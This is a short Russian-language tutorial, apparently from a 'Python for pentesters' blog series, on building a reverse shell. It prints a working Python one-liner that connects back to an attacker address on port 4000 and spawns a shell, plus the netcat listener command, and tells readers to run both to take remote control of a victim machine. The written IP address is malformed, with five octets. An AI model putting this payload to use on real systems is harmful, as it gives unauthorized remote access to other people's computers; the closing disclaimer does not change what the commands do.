#5 Python для пентестера. Reverse Shell
Введение:
В этой статье мы создадим свой Reverse Shell для управления целевым компьютером с помощью Python!
Как мы уже раньше разбирали, обратное подключение позволяет атакующему компьютеру управлять жертвой без надобности подключения к ней, вместо этого жертва подключается к нашему компьютеру и получает команды.
Основное:
Чтобы каждый раз не писать Reverse Shell для определенного компьютера, существуют готовые пейлоады на разных языках и в разных контекстах. Существуют и целые генераторы, один из самых популярных - https://www.revshells.com/
Зайдя на страницу мы можем увидеть множество полей, но пугаться не стоит:
В поле IP мы введем адресс нашего компьютера, узнать его можно на 2ip.ru
В поле порта мы введем удобный для нас порт для подключения, пусть это будет 4000
Теперь в нижнем углу выберем вариант "Python #1" и сгенерируем наш пэйлоад!
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("94.43.65.1.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
В верхнем углу находится 2 команда:
nc -lvnp 4000
Она предназначена для управляющего компьютера, то есть для нашего.
Запускаем обе команды на разных компьютерах и получаем удаленный доступ!
У многих возникнет вопрос, но почему Python? Все просто, Python это кросс-платформенный язык который есть на самых различных компьютерах с разными ОС, а значит он может пригодиться в качестве языка для взлома.
Python является разносторонним языком и позволяет написать самые разные инструменты, в данной статье мы увидели еще одно применение ему. Что касается написания пэйлоадов, мы научились в несколько кликов генерировать команды для взлома стороннего компьютера!
Внимание! Вся информация строго в ознакомительно-познавательных целях. Автор данной статьи, а также ресурс на котором он размещает данную статью, не несут ответственности за любые последствия от ее прочтения, а также за ваше плохое самочувствие, детей - двоечников и долги по ипотеке.